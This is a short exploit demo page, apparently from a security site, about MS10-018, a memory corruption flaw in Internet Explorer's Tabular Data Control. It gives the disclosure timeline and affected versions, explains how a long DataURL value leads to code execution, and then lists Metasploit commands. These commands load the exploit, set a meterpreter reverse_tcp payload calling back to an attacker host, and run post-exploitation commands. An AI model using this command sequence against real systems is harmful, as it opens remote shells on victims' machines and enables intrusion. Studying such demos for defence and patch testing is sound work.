aka wow on ZATAZ.com
MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
Timeline :
Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182″ provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05
PoC provided by :
Anonymous
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
Commands :
use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
- MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo
- MS12-004 Windows Media Remote Code Execution Metasploit Demo
- MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo
- MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo
- MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
- Metasploit Exploitation Scenarios – Scenario 1
- MS11-011 : Windows UAC Bypass 0day
- MS10-046 : Microsoft Windows Shell LNK Execution
- MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption